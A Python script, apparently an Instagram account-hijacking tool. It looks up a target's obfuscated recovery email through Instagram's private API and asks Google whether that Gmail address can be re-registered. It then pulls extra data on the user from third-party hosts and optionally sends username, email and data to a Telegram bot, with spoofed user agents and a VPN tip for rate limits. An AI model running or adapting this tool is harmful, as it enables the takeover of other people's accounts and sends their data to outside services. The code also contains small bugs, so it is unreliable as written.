import requests,random,json
def ops (to,ic):
 user= input("[?] user : ")
 urm="https://jftv.pythonanywhere.com/IGMail/"
 tt=f"https://api.telegram.org/{to}/sendMessage?chat_id={ic}&text="
 ic="https://o7aa.pythonanywhere.com/?id="
 urlg='https://android.clients.google.com/setup/checkavail'
 hedg={
     'Content-Length':'98',
     'Content-Type':'text/plain; charset=UTF-8',
     'Host':'android.clients.google.com',
     'Connection':'Keep-Alive',
     'user-agent':'GoogleLoginService/1.3(m0 JSS15J)',}
 datg=json.dumps({
 'username':user+"@gmail.com",
 'version':'3',
 'firstName':'NMCT',
 'lastName':'STORE'})
 no="-> It's not available"
 try:
  user=user.split("/")[3]
  user=user.split("?")[0] or user.split("/")[0]
 except:
  pass
 Req = requests.post("https://i.instagram.com:443/api/v1/users/lookup/", headers={"User-Agent":"Instagram 187.0.0.32.120 Android(29 / 10; 480dpi; 1080x2107; HUAWEI; MAR - LX1M; HWMAR; kirin710; en_US; 289692181)"}, data={"q":user})
 print (Req.text)
 if '"status":"ok"' in Req.text:
  iid=Req.json()["user_id"]
  do=Req.json()["obfuscated_email"]
  if "*@g*.com" == do:
   res = requests.post(url=urlg,data=datg,headers=hedg)
   if res.text == '{"status":"SUCCESS"}':
    rm=requests.get(urm+user+"@googlemail.com").text
    if "Linked Or Ban" in rm:
     x=requests.get(ic+iid).json()
     idd=x["data"]
     if t == 1 :
      requests.post(tt+"USER : "+user+"\nEMAIL : "+user+"@googlemail.com\nDATA : "+idd)
     print(f"-> It's available\n-> email : {user}@googlemail.com")
    else:
     print(no)
   else:
    print(no)
  elif "*@gmail.com" == do:
   res = requests.post(url=urlg,data=datg,headers=hedg)
   if res.text == '{"status":"SUCCESS"}':
    rm=requests.get(urm+user+"@gmail.com").text
    if "Linked Or Ban" in rm:
     x=requests.get(ic+iid).json()
     idd=x["data"]
     if t == 1 :
      requests.post(tt+"USER : "+user+"\nEMAIL : "+user+"@gmail.com\nDATA : "+idd+"\n@zxxxxzv")
     print(f"-> It's available\n-> email : {user}@gmail.com")
    else:
     print(no)
   else:
    print(no)
  else:
   print("-> domen : "+do)
 elif Req.text == '{"message":"No users found","status":"fail"}':
  print("-> No users found")
 elif "Please wait a few minutes before you try again" in Req.text:
  input("\n[!] try with vpn")
 else:
  print("[!!!] ERROR .... Send a screenshot to me")
t=int(input("[?] send to tele : 1 > yes , 2 > no\n[>] "))
if t == 1 :
	ic=int(input("[?] id : "))
	to=input("[?] token : ")
else:
	ic=0
	to=""
while 1 :
 ops(to,ic)
